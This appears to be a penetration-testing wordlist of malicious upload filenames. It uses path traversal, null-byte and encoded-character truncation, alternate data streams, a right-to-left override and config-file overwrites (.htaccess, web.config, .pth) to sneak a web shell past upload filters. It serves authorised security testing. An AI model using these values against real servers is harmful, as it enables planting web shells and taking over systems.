# File upload — filename / path tricks (PAT Upload Insecure Files)
# Multipart filename= parameter values. Authorized testing only.

shell.php
../shell.php
..\\shell.php
....//....//shell.php
..%2fshell.php
..%5cshell.php
%2e%2e%2fshell.php
%2e%2e%5cshell.php
....\/....\/shell.php
/var/www/html/shell.php
/var/www/html/../../../../tmp/shell.php
C:\\inetpub\\wwwroot\\shell.aspx
shell.php%00.jpg
shell.php\x00.png
shell.php%00.gif
shell.php%00
shell.php%2500.jpg
shell.php%00%00.jpg
shell.php%0a
shell.php%0d%0a.jpg
shell.php%20
shell.php%09
shell.php/
shell.php\
shell.php//
shell.php\\\
shell.php;.
shell.php%3b.jpg
shell.php%3b.png
shell.php%3b.gif
shell.php%3b
shell.php%3b%00.jpg
shell.php%00%00%00.jpg
shell.php.....
shell.php.....
shell.php 
shell.php.
shell.php..
shell.php...
shell.php/
shell.php\
shell.php%2f
shell.php%5c
shell.php%252f
shell.php%255c
shell.php%00%00%00%00.jpg
shell.php%00.png%00.jpg
shell.php%00.gif%00.jpg
shell.php%00.jpg%00.png
shell.php%00.jpg%00.gif
shell.php%00.jpg%00.png%00.gif
shell.php%00.jpg%00.png%00.gif%00.jpg
shell.php%00.jpg%00.png%00.gif%00.jpg%00.png
shell.php%00.jpg%00.png%00.gif%00.jpg%00.png%00.gif
shell.php%00.jpg%00.png%00.gif%00.jpg%00.png%00.gif%00.jpg
shell.php%00.jpg%00.png%00.gif%00.jpg%00.png%00.gif%00.jpg%00.png
shell.php%00.jpg%00.png%00.gif%00.jpg%00.png%00.gif%00.jpg%00.png%00.gif
filename*=UTF-8''shell.php
filename*=UTF-8''shell%0a.php
filename*=UTF-8''myfile%0a.txt
filename='shell.php'
filename="shell.php"
filename=shell.php
filename=shell.php%00.jpg
filename=shell.php\x00.jpg
filename=shell.php%00.png
filename=shell.php%00.gif
filename=shell.php%00
filename=shell.php%2500.jpg
filename=shell.php%00%00.jpg
filename=shell.php%0a
filename=shell.php%0d%0a.jpg
filename=shell.php%20
filename=shell.php%09
filename=shell.php/
filename=shell.php\
filename=shell.php//
filename=shell.php\\\
filename=shell.php;
filename=shell.php%3b.jpg
filename=shell.php%3b.png
filename=shell.php%3b.gif
filename=shell.php%3b
filename=shell.php%3b%00.jpg
filename=shell.php%00%00%00.jpg
filename=shell.php.....
filename=shell.php 
filename=shell.php.
filename=shell.php..
filename=shell.php...
name.%E2%80%AEphp.jpg
shell.asax:.jpg
shell.aspx:shell.jpg
shell.asp::$data
shell.php::$data.
web<<config
web"config
web.config%00.jpg
.htaccess
.htaccess.php
.htaccess%00.jpg
web.config
web.config%00.jpg
__init__.py
uwsgi.ini
persistence.pth
